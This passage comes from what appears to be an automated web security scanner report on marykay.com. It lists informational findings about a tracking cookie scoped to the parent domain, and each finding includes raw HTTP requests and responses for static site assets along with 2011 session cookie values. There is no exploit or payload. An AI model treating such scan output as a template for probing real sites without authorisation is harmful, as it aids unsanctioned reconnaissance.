GET /Images/Site/FooterBack1.gif HTTP/1.1 Host: www.marykay.com Proxy-Connection: keep-alive Referer: http://www.marykay.com/default.aspx?pid=mk User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; TLTHID=9F32F1D24088FD7A7C1A4C8250D2F93D; www.marykay.com=554376364.20480.0000
Response
HTTP/1.1 200 OK Content-Length: 1466 Content-Type: image/gif Last-Modified: Thu, 02 Jun 2011 09:20:13 GMT Accept-Ranges: bytes ETag: "ebcd3647621cc1:d822e" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NETSet-Cookie: TLTHID=E80F63564B8C8303276E31A8100ACBE7; Path=/; Domain=.marykay.com HostName: WDDCEPPWS103 Date: Tue, 06 Sep 2011 16:45:49 GMT Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:50 GMT; path=/ GIF89a..'..................................................................................................................................................................................................[SNIP]...
12.85. http://www.marykay.com/Images/Site/hdottedline.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.marykay.com
Path:
/Images/Site/hdottedline.gif
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:TLTHID=5BABE8214E2E52E7EF445991E652AAEE; Path=/; Domain=.marykay.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /Images/Site/hdottedline.gif HTTP/1.1 Host: www.marykay.com Proxy-Connection: keep-alive Referer: http://www.marykay.com/default.aspx?pid=mk User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; TLTHID=9F32F1D24088FD7A7C1A4C8250D2F93D; www.marykay.com=554376364.20480.0000
Response
HTTP/1.1 200 OK Content-Length: 809 Content-Type: image/gif Last-Modified: Thu, 02 Jun 2011 09:20:13 GMT Accept-Ranges: bytes ETag: "b3923b47621cc1:d825c" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NETSet-Cookie: TLTHID=5BABE8214E2E52E7EF445991E652AAEE; Path=/; Domain=.marykay.com HostName: WDDCEPPWS103 Date: Tue, 06 Sep 2011 16:45:51 GMT Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:51 GMT; path=/ GIF89a.....................................................................................................................................................................................................[SNIP]...
12.86. http://www.marykay.com/Images/Site/searchbox.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.marykay.com
Path:
/Images/Site/searchbox.gif
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:TLTHID=88AE95AF4B09A6E0090F8F9802D95C67; Path=/; Domain=.marykay.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /Images/Site/searchbox.gif HTTP/1.1 Host: www.marykay.com Proxy-Connection: keep-alive Referer: http://www.marykay.com/default.aspx?pid=mk User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; TLTHID=BA53BB5644EB3C70267713937AE89A33; www.marykay.com=554376364.20480.0000
Response
HTTP/1.1 200 OK Content-Length: 952 Content-Type: image/gif Last-Modified: Thu, 02 Jun 2011 09:20:13 GMT Accept-Ranges: bytes ETag: "17f53d47621cc1:d822e" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NETSet-Cookie: TLTHID=88AE95AF4B09A6E0090F8F9802D95C67; Path=/; Domain=.marykay.com HostName: WDDCEPPWS103 Date: Tue, 06 Sep 2011 16:45:49 GMT Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:50 GMT; path=/ GIF89a.......xKKlCB|OLqFEb=<Z87f?>sHEwKIoFD|MKzKK\:7|ON^;;oFEfA>^;9wJI\87lEBhC@jCB|OKb?<wKKuJG.ONzMKb=;`;;~ONsFEsHG`=;|MLZ:7|KKsJGd?>mFDmEB\;9.POb;;d?<jC@qHE\:9.PNhC>wJGxMK\;7hA@~OLoFB^:9xKIoEBmCBf?<m...[SNIP]...
12.87. http://www.marykay.com/Images/Site/vdottedline.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.marykay.com
Path:
/Images/Site/vdottedline.gif
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:TLTHID=AA5C39604E80A1CDD53924B3552910F6; Path=/; Domain=.marykay.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /Images/Site/vdottedline.gif HTTP/1.1 Host: www.marykay.com Proxy-Connection: keep-alive Referer: http://www.marykay.com/default.aspx?pid=mk User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; TLTHID=9F32F1D24088FD7A7C1A4C8250D2F93D; www.marykay.com=554376364.20480.0000
Response
HTTP/1.1 200 OK Content-Length: 809 Content-Type: image/gif Last-Modified: Thu, 02 Jun 2011 09:20:13 GMT Accept-Ranges: bytes ETag: "a77e4747621cc1:d825c" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NETSet-Cookie: TLTHID=AA5C39604E80A1CDD53924B3552910F6; Path=/; Domain=.marykay.com HostName: WDDCEPPWS103 Date: Tue, 06 Sep 2011 16:45:51 GMT Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:51 GMT; path=/ GIF89a.....................................................................................................................................................................................................[SNIP]...
12.88. http://www.marykay.com/Images/Site/wholeheader.jpg
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.marykay.com
Path:
/Images/Site/wholeheader.jpg
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:TLTHID=3E2B08524645FEB844AB7DB6BC20BE5E; Path=/; Domain=.marykay.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /Images/Site/wholeheader.jpg HTTP/1.1 Host: www.marykay.com Proxy-Connection: keep-alive Referer: http://www.marykay.com/default.aspx?pid=mk User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; TLTHID=0CA8F6134F6BF5C078C5DCA0DFE88F3B; www.marykay.com=554376364.20480.0000
Response
HTTP/1.1 200 OK Content-Length: 13033 Content-Type: image/jpeg Last-Modified: Thu, 02 Jun 2011 09:20:13 GMT Accept-Ranges: bytes ETag: "be14947621cc1:d822e" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NETSet-Cookie: TLTHID=3E2B08524645FEB844AB7DB6BC20BE5E; Path=/; Domain=.marykay.com HostName: WDDCEPPWS103 Date: Tue, 06 Sep 2011 16:45:49 GMT Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:50 GMT; path=/ ......JFIF.....d.d......Ducky.......<......Adobe.d.................... ... ....... . ..........................................................................................................u.......[SNIP]...
12.89. http://www.marykay.com/JS/swfobject.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.marykay.com
Path:
/JS/swfobject.js
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:TLTHID=CCA92511426CCAC77EAB528D54BE529A; Path=/; Domain=.marykay.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /JS/swfobject.js HTTP/1.1 Host: www.marykay.com Proxy-Connection: keep-alive Referer: http://www.marykay.com/default.aspx?pid=mk User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; TLTHID=BEE60304423925D85D6C08B50AA3F8E6; www.marykay.com=554376364.20480.0000
Response
HTTP/1.1 200 OK Content-Length: 6902 Content-Type: application/x-javascript Last-Modified: Thu, 02 Jun 2011 09:18:24 GMT Accept-Ranges: bytes ETag: "070ef5621cc1:d826e" Vary: Accept-Encoding Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NETSet-Cookie: TLTHID=CCA92511426CCAC77EAB528D54BE529A; Path=/; Domain=.marykay.com HostName: WDDCEPPWS103 Date: Tue, 06 Sep 2011 16:45:45 GMT Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:46 GMT; path=/ /** * SWFObject v1.4.4: Flash Player detection and embed - http://blog.deconcept.com/swfobject/ * * SWFObject is (c) 2006 Geoff Stearns and is released under the MIT License: * http://www.open...[SNIP]...
12.90. http://www.marykay.com/Menu.css
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.marykay.com
Path:
/Menu.css
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:TLTHID=69ED8CC0428ECB34AD8AD5AB8137F4A2; Path=/; Domain=.marykay.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /Menu.css HTTP/1.1 Host: www.marykay.com Proxy-Connection: keep-alive Referer: http://www.marykay.com/default.aspx?pid=mk User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; TLTHID=BEE60304423925D85D6C08B50AA3F8E6; www.marykay.com=554376364.20480.0000
Response
HTTP/1.1 200 OK Content-Length: 4421 Content-Type: text/css Last-Modified: Thu, 02 Jun 2011 09:18:09 GMT Accept-Ranges: bytes ETag: "809efefc521cc1:d826e" Vary: Accept-Encoding Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NETSet-Cookie: TLTHID=69ED8CC0428ECB34AD8AD5AB8137F4A2; Path=/; Domain=.marykay.com HostName: WDDCEPPWS103 Date: Tue, 06 Sep 2011 16:45:45 GMT Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:46 GMT; path=/ .commentfix{} /* These styles contain RARELY CHANGED rules used when the Menu control adapter is enabled. */ /* These rules correspond to the "pure CSS menu" technique that have been evolving over t...[SNIP]...
12.91. http://www.marykay.com/Scripts/HeaderScript.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.marykay.com
Path:
/Scripts/HeaderScript.js
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:TLTHID=2DE4171146CE3D4441DE1B8AB44DB9C4; Path=/; Domain=.marykay.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /Scripts/HeaderScript.js HTTP/1.1 Host: www.marykay.com Proxy-Connection: keep-alive Referer: http://www.marykay.com/default.aspx?pid=mk User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; TLTHID=BEE60304423925D85D6C08B50AA3F8E6; www.marykay.com=554376364.20480.0000
Response
HTTP/1.1 200 OK Content-Length: 1283 Content-Type: application/x-javascript Last-Modified: Wed, 06 Apr 2011 17:12:25 GMT Accept-Ranges: bytes ETag: "80e28bcc7df4cb1:d826e" Vary: Accept-Encoding Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NETSet-Cookie: TLTHID=2DE4171146CE3D4441DE1B8AB44DB9C4; Path=/; Domain=.marykay.com HostName: WDDCEPPWS103 Date: Tue, 06 Sep 2011 16:45:47 GMT Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:47 GMT; path=/ ...var headID = document.getElementsByTagName("head")[0]; if (typeof jQuery == 'undefined') { //alert("Jquery not present"); var newScriptJQuery = document.createElement('script'); new...[SNIP]...
12.92. http://www.marykay.com/Scripts/jquery-1.4.2.min.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.marykay.com
Path:
/Scripts/jquery-1.4.2.min.js
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:TLTHID=C45F6C2F49D028674DB98F82BB89FB3E; Path=/; Domain=.marykay.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /Scripts/jquery-1.4.2.min.js HTTP/1.1 Host: www.marykay.com Proxy-Connection: keep-alive Referer: http://www.marykay.com/default.aspx?pid=mk User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; TLTHID=BA53BB5644EB3C70267713937AE89A33; www.marykay.com=554376364.20480.0000
Response
HTTP/1.1 200 OK Content-Length: 38069 Content-Type: application/x-javascript Last-Modified: Wed, 06 Apr 2011 17:12:25 GMT Accept-Ranges: bytes ETag: "80e28bcc7df4cb1:d826e" Vary: Accept-Encoding Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NETSet-Cookie: TLTHID=C45F6C2F49D028674DB98F82BB89FB3E; Path=/; Domain=.marykay.com HostName: WDDCEPPWS103 Date: Tue, 06 Sep 2011 16:45:48 GMT Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:49 GMT; path=/ /*! * jQuery JavaScript Library v1.3 * http://jquery.com/ * * Copyright (c) 2009 John Resig * Dual licensed under the MIT and GPL licenses. * http://docs.jquery.com/License * * Date: 2...[SNIP]...
12.93. http://www.marykay.com/Styles.css
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.marykay.com
Path:
/Styles.css
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:TLTHID=0CA8F6134F6BF5C078C5DCA0DFE88F3B; Path=/; Domain=.marykay.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /Styles.css HTTP/1.1 Host: www.marykay.com Proxy-Connection: keep-alive Referer: http://www.marykay.com/default.aspx?pid=mk User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; TLTHID=BEE60304423925D85D6C08B50AA3F8E6; www.marykay.com=554376364.20480.0000
Response
HTTP/1.1 200 OK Content-Length: 14259 Content-Type: text/css Last-Modified: Wed, 10 Aug 2011 07:14:08 GMT Accept-Ranges: bytes ETag: "0e050182d57cc1:d826e" Vary: Accept-Encoding Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NETSet-Cookie: TLTHID=0CA8F6134F6BF5C078C5DCA0DFE88F3B; Path=/; Domain=.marykay.com HostName: WDDCEPPWS103 Date: Tue, 06 Sep 2011 16:45:45 GMT Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:46 GMT; path=/ /*******************************************************************************************************************\ * Global Styles ...[SNIP]...
12.94. http://www.marykay.com/Styles_US.css
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.marykay.com
Path:
/Styles_US.css
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:TLTHID=4162573847264D86536F4E90C80EA38A; Path=/; Domain=.marykay.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /Styles_US.css HTTP/1.1 Host: www.marykay.com Proxy-Connection: keep-alive Referer: http://www.marykay.com/default.aspx?pid=mk User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; TLTHID=BEE60304423925D85D6C08B50AA3F8E6; www.marykay.com=554376364.20480.0000
Response
HTTP/1.1 200 OK Content-Length: 23822 Content-Type: text/css Last-Modified: Thu, 02 Jun 2011 09:18:10 GMT Accept-Ranges: bytes ETag: "03597fd521cc1:d826e" Vary: Accept-Encoding Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NETSet-Cookie: TLTHID=4162573847264D86536F4E90C80EA38A; Path=/; Domain=.marykay.com HostName: WDDCEPPWS103 Date: Tue, 06 Sep 2011 16:45:45 GMT Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:46 GMT; path=/ /*******************************************************************************************************************\ * Global Styles ...[SNIP]...
12.95. http://www.marykay.com/Themes/TabMenu/US/tabs.css
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.marykay.com
Path:
/Themes/TabMenu/US/tabs.css
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:TLTHID=6F98459542F76D915AA05BB75B891338; Path=/; Domain=.marykay.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /Themes/TabMenu/US/tabs.css HTTP/1.1 Host: www.marykay.com Proxy-Connection: keep-alive Referer: http://www.marykay.com/default.aspx?pid=mk User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; TLTHID=BEE60304423925D85D6C08B50AA3F8E6; www.marykay.com=554376364.20480.0000
Response
HTTP/1.1 200 OK Content-Length: 0 Content-Type: text/css Last-Modified: Wed, 06 Apr 2011 17:12:30 GMT Accept-Ranges: bytes ETag: "7970d2cf7df4cb1:d8226" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NETSet-Cookie: TLTHID=6F98459542F76D915AA05BB75B891338; Path=/; Domain=.marykay.com HostName: WDDCEPPWS103 Date: Tue, 06 Sep 2011 16:45:45 GMT Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:46 GMT; path=/
12.96. http://www.marykay.com/Themes/TabMenu/tabs.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.marykay.com
Path:
/Themes/TabMenu/tabs.js
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:TLTHID=A5B951464DDB4DF25E342EB344BDA973; Path=/; Domain=.marykay.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /Themes/TabMenu/tabs.js HTTP/1.1 Host: www.marykay.com Proxy-Connection: keep-alive Referer: http://www.marykay.com/default.aspx?pid=mk User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; TLTHID=BEE60304423925D85D6C08B50AA3F8E6; www.marykay.com=554376364.20480.0000
Response
HTTP/1.1 200 OK Content-Length: 14231 Content-Type: application/x-javascript Last-Modified: Wed, 06 Apr 2011 17:12:28 GMT Accept-Ranges: bytes ETag: "0a655ce7df4cb1:d826e" Vary: Accept-Encoding Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NETSet-Cookie: TLTHID=A5B951464DDB4DF25E342EB344BDA973; Path=/; Domain=.marykay.com HostName: WDDCEPPWS103 Date: Tue, 06 Sep 2011 16:45:45 GMT Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:46 GMT; path=/ var delay = 1000; var seltab = null; var prevtab = null; function tabs_init(id) { seltab = document.getElementById(id); showTab(seltab, false); } function hideMenu(menu) { if (menu != nul...[SNIP]...
12.97. http://www.marykay.com/content/HPflash/portfolio_mk.xml
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.marykay.com
Path:
/content/HPflash/portfolio_mk.xml
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:TLTHID=19C9D0014D75852EFB8C9087C106B6A5; Path=/; Domain=.marykay.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /content/HPflash/portfolio_mk.xml HTTP/1.1 Host: www.marykay.com Proxy-Connection: keep-alive Referer: http://www.marykay.com/content/hpflash/stage.swf User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2733271E851D12D2-600001058002D751[CE]; TLTHID=5BABE8214E2E52E7EF445991E652AAEE; www.marykay.com=554376364.20480.0000
Response
HTTP/1.1 200 OK Content-Length: 316 Content-Type: text/xml Last-Modified: Wed, 31 Aug 2011 14:47:25 GMT Accept-Ranges: bytes ETag: "8bceaae5ec67cc1:d825c" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NETSet-Cookie: TLTHID=19C9D0014D75852EFB8C9087C106B6A5; Path=/; Domain=.marykay.com HostName: WDDCEPPWS103 Date: Tue, 06 Sep 2011 16:45:52 GMT Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:53 GMT; path=/ <?xml version="1.0" ?> <portfolio> <picture thumb = "/CONTENT/HPflash/Thumbs/tb_eyebundles.jpg"/> <picture thumb = "/CONTENT/HPflash/Thumbs/tb_mascarawardrobe.jpg"/> <picture thumb = "/CONTE...[SNIP]...
12.98. http://www.marykay.com/content/hpflash/stage.swf
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.marykay.com
Path:
/content/hpflash/stage.swf
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:TLTHID=9326E0864457B586C81FDD8CE24A23E5; Path=/; Domain=.marykay.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /content/hpflash/stage.swf HTTP/1.1 Host: www.marykay.com Proxy-Connection: keep-alive Referer: http://www.marykay.com/default.aspx?pid=mk User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; TLTHID=9F32F1D24088FD7A7C1A4C8250D2F93D; www.marykay.com=554376364.20480.0000
Response
HTTP/1.1 200 OK Content-Length: 41607 Content-Type: application/x-shockwave-flash Last-Modified: Fri, 03 Jun 2011 15:46:18 GMT Accept-Ranges: bytes ETag: "a318661522cc1:d8265" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NETSet-Cookie: TLTHID=9326E0864457B586C81FDD8CE24A23E5; Path=/; Domain=.marykay.com HostName: WDDCEPPWS103 Date: Tue, 06 Sep 2011 16:45:50 GMT Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:51 GMT; path=/ CWS..i..x...wTS..(<IH..1T..@..t.I..$...(J7A......%... .!tAQ..("(.X "*6., v. ......w....?..u....={f~.M......P..@.....q@OLL..-F.>.......:.....`=3j.[X.....8`.)..`o4j.X.....e.^....".ak.....`....QA...o......[SNIP]...
12.99. http://www.marykay.com/default.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.marykay.com
Path:
/default.aspx
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:TLTHID=A79DE10345855E54FDA05590CB54614B; Path=/; Domain=.marykay.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /default.aspx?pid=mk HTTP/1.1 Host: www.marykay.com Proxy-Connection: keep-alive Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Direct+Beauty+Product User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: Subsidiary=US; TLTHID=DFDB2FDD45BA94FC283A74BD7C3CBF64; TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; www.marykay.com=554376364.20480.0000
Response
